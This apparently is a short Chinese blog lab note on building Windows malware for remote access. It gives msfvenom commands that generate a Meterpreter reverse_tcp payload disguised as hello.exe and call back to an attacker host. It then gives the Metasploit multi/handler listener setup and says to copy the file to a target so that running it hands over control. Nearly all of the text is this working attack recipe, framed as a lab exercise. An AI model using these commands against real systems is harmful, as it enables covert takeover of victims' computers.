//实验内容:制作Windows恶意软件获取shell //Msfvenom的shell在Windows中使用的msfvenom生成shell.exe //制作恶意shell msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.5 lport=2323 -f exe > hello.exe
//启动metaspliot msfconsole
//设置侦听 //加载模块 use exploit/multi/handler //设置攻击载荷 set payload windows/meterpreter/reverse_tcp //设置kali的IP set lhost xxx.xxx.xxx.xxx //设置kali的端口 set lport 2323 //开始等待用户运行文件 run
//将生成的shell文件复制到靶机中
//当用户运行hello.exe文件后,我们就拥有了控制权
标签:exe,set,xxx,获取,shell,设置,第二节,制作 From: https://www.cnblogs.com/feigg/p/17765651.html